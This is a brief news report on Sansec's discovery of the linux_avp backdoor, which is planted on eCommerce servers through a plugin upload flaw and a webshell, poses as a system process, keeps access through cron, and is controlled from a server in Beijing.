Sansec announced that they have discovered a new malicious agent, linux_avp, which is capable of hiding as one of the system processes resides in eCommerce servers. Sansec also stated that the malware is being deployed since last week. The malware agent is taking commands from an Alibaba server located in Beijing.
Controlled from China
According to Sansec’s announcement, the attack started with automated eCommerce attack probes. It tests various weaknesses in eCommerce platforms. The attackers managed to find a vulnerability in file uploading located in a plugin. The vulnerability allowed attackers to upload a webshell to modify the server code enabling them to intercept customer data.
The malware removes itself from the disk and disguised as a fake “ps -ef” process
The attackers also upload a Golang program called linux-avp. It is capable of removing itself from the disk and disguising itself as a fake “ps -ef” process. Sansec’s analysis showed that linux_avp serves as a backdoor and waits for commands from an Alibaba-hosted server in Beijing.
The backdoor was built in a project folder lin_avp by user “dob” using the code name “GREECE”. It also injects a crontab entry which grants access even if the process is removed or the server rebooted.
Sansec stated that currently, no other anti-virus vendors are aware of the situation. The malware is uploaded by an anonymous user, who can be the author, to Virustotal on 8 October. Sansec updated its detection capabilities for its eComscan security monitor and detected the malware on several servers located in the U.S. and Europe.